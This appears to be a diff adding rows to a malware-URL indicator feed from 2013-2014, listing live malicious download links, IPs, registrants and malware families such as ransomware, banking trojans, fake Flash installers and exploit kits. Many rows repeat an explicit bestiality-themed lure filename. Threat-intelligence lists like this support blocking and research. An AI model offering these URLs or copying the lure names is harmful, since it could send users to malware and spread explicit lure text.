+"2013/09/12_05:48","tube8vidspeq.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsqof.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsrau.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsrdr.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsrhl.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsrom.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidssan.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidssjw.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidssyg.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidstrh.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidstyp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 
+"2013/09/12_05:48","tube8vidsuty.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsvaj.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsvcs.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsvmr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtuberfe.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtuberjj.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtuberme.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtuberue.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubesrs.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubesrw.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubesun.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 
+"2013/09/12_05:48","slimxxxtubetmf.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubetmg.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubetns.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubetts.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeubp.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeujh.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeull.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeuvd.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubevdn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubevih.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", 
+"2013/09/12_05:48","slimxxxtubevjk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubewfl.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubewiq.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubewis.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubewmt.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubexei.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubexiv.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubexvq.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubexwb.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubexxq.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeyge.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 
+"2013/09/12_05:48","slimxxxtubeyhz.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeyza.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsbbr.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsbhy.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsbzx.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidscjk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubehdn.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubehli.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeidv.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeijc.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeiqb.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, 
ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubejie.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubejlp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubejpe.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubejvh.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubejyk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubekad.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubekgj.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubekgv.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeklg.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubekpn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubekrn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 
+"2013/09/12_05:48","slimxxxtubelap.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubelat.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubelfr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubelzv.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubemue.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeneg.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeneu.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubengt.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubenqp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubentf.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeocr.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", 
+"2013/09/12_05:48","slimxxxtubeonf.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeopy.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeoxo.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeoxy.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeppj.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeqfo.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeqsh.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeqve.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeqwr.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtuberau.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtuberea.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 
+"2013/09/12_05:48","slimxxxtuberep.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","generalchemicalsupply.com/gLG.exe","174.132.149.189","bd.95.84ae.static.theplanet.com.","Trojan.Agent.rfz","A-Ware Marketing / webservices@awaremarketing.net","21844","0","--", +"2013/09/12_05:48","slimxxxtubeacn.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubealn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeanr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeaxy.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeayv.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubebej.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubebgp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubebmq.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubebnd.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 
+"2013/09/12_05:48","slimxxxtubecgl.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubectk.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubecty.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeczp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubedgv.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubedjm.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubedlb.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubedvj.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubedxc.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubedya.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeejs.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 
+"2013/09/12_05:48","slimxxxtubeemz.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubefdr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubefel.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeftb.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubefzc.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubehan.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidszyj.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/23_04:50","cofeb13east.com/download.php?ln5/cA==","50.97.234.2","-","Win32/InstallMonetizer","-","36351","0","US", +"2013/10/21_21:43","morenews3.net/got.php?l=dWlkP_IxMjg4NDU1ODImaWQ9NDAxO_AmdGlkP_QwNDM3Ni","37.220.26.172","-","Drive-by","contact@privacyprotect.org","35662","0","GB", +"2013/10/21_21:48","gredinatib.org/got.php?l=dWlkPTgyODM3MTI1NiZpZD01MDIyNiZ0aWQ9Mjc2NDE4JnBjPW","37.220.26.131","-","Drive-by","contact@privacyprotect.org","35662","0","GB", +"2013/10/27_02:56","-","178.150.192.50/traff01.exe","-","Trojan","-","13188","0","UA", +"2013/10/27_02:56","-","178.150.192.50/upeksvr.exe","-","Trojan","-","13188","0","UA", +"2013/10/27_02:56","-","178.150.202.131/same7b1.exe","-","Trojan","-","13188","0","UA", 
+"2013/10/27_02:59","-","94.228.222.47/index.html?p=6175","-","Trojan","-","47869","0","NL", +"2013/10/27_03:02","tecslide.com/js/down/Sbin1/MS0ftAdapter.exe","80.241.217.134","-","Trojan","Domain Admin (contact@privacyprotect.org","51167","0","DE", +"2013/10/27_03:02","www.slivki.com.ua/as/Ponynl.exe","212.26.135.68","-","Trojan","=========== / hostmaster-telecom@adamant.net","8788","0","UA", +"2013/10/27_03:02","www.slivki.com.ua/as/smp.exe","212.26.135.68","-","Trojan","=========== / hostmaster-telecom@adamant.net","8788","0","UA", +"2013/10/27_03:06","bizzibeans.net/wp-admin/zope/","82.165.116.169","-","Leads to trojan","Registrant toddlewis@talktalk.net","8560","0","DE", +"2013/10/27_03:06","bizzibeans.net/wp-admin/zope/adobe_flash.exe","82.165.116.169","-","Trojan","Registrant toddlewis@talktalk.net","8560","0","DE", +"2014/03/31_11:44","-","185.12.14.208/adm/documentos.zip","-","Trojan.Banker","-","50673","0","NL", +"2014/03/21_09:24","www.two-of-us.at/images/4x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/11_22:39","directxex.com/uploads/1835173533.ms.exe?dl=1","108.162.198.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1835173533.ms.exe","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/2.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_13:13","kids-fashion.dk/browser.php?copy=9763&common-prop=0&edit=0","94.231.107.252","linux20.unoeuro.com.","exploit kit","-","48854","0","DK", 
+"2014/04/27_12:36","-","94.242.225.240/download/34/VUBSXlcUUk9ITQQQbyctMScgNWkuKDk/YSAnPX4jJ3wzMCIIMio1NWMuKj1dUEQHDQFbUF9bXVxZXVlXVhcbHxEqHxNFDR21Og/anzhelika_varum_-_lyalyafa_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/03/11_22:39","directxex.com/uploads/1406101817.Server.exe","108.162.199.96","-","MSIL/Bladabindi.F trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/youtube/d/flashplayer.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/11_22:39","directxex.com/uploads/1144786436.be.exe","108.162.199.96","-","Gen:Variant.Symmi.35186","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/3.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/11_22:39","directxex.com/uploads/1010343014.server12345.exe","108.162.198.96","-","Win32/Injector.AYMT trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/777.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/01/22_22:22","downloads-whatsapp.com","91.218.229.16","h7.ihc.ru.","Android/Trojan.SMS.FakeInst","-","48172","0","RU", +"2014/01/22_22:22","downloads-whatsapp.com/whatsapp-for-nokia.php","91.218.229.16","h7.ihc.ru.","Android/Trojan.SMS.FakeInst","-","48172","0","RU", +"2014/04/27_12:36","-","94.242.225.240/download/05/ZHNjYWYnY3h5fjU/PnR8ZnZzZDZ/e2hoMHN2Ug9QVgtCQ1N3Q1lEQhJdW1IMAxVQXFIKDw4IDAUNCgl2ZyQqKCAZLix0DR3GIA/voskresenie_-_muzykant_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", 
+"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=10","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/04/27_12:36","-","94.242.225.240/download/ab/ytnJx8Cd2cbHxIZmN7WyNjZzpDZobK27qmstOm6vOWsqbmRpaOvOynobTq6fsrjg6ejS1tPa0NLUwY6Aho6zhIrSDR12BA/serebro_-_skazhi_ne_molchi_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/03/21_09:24","www.two-of-us.at/images/au.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/youtube/d/flashplayer.html","85.158.181.11","server143-han.de-nserver.de.","Mal.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/11_22:39","directxex.com/uploads/1021119574.C-Chrome.exe","108.162.199.96","-","Win32/Injector.AYKD trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1010343014.server12345.exe","108.162.199.96","-","Generic Malware","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_11:24","doktester.orgfree.com/styles/jrtXnMPq.php?html=27","144.76.99.221","users.orgfree.hosting.free.","leads to fake flashplayer installer at OneDrive","Registrant support@freewha.com","24940","0","DE", +"2013/10/31_18:23","www.blueimagen.com/Attachment/Invoice-List2013-10-20-Copy.jar","65.99.225.72","server79.neubox.net.","Trojan.AdWind","Tools Ideas Enter (staff@toolsideascreativas.com)","36024","0","US", +"2013/11/19_15:22","silurian.cn/modules/mod_cmsfix/fix.php","159.226.74.251","-","iframe leads to exploit kit","Registrant Contact fanjunxuan@gmail.com / Registrant Contact fanjunxuan@gmail.com","7497","0","CN", +"2014/03/11_22:39","mylondon.hc0.me/Panel/","5.135.127.68","-","Solar EK","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", 
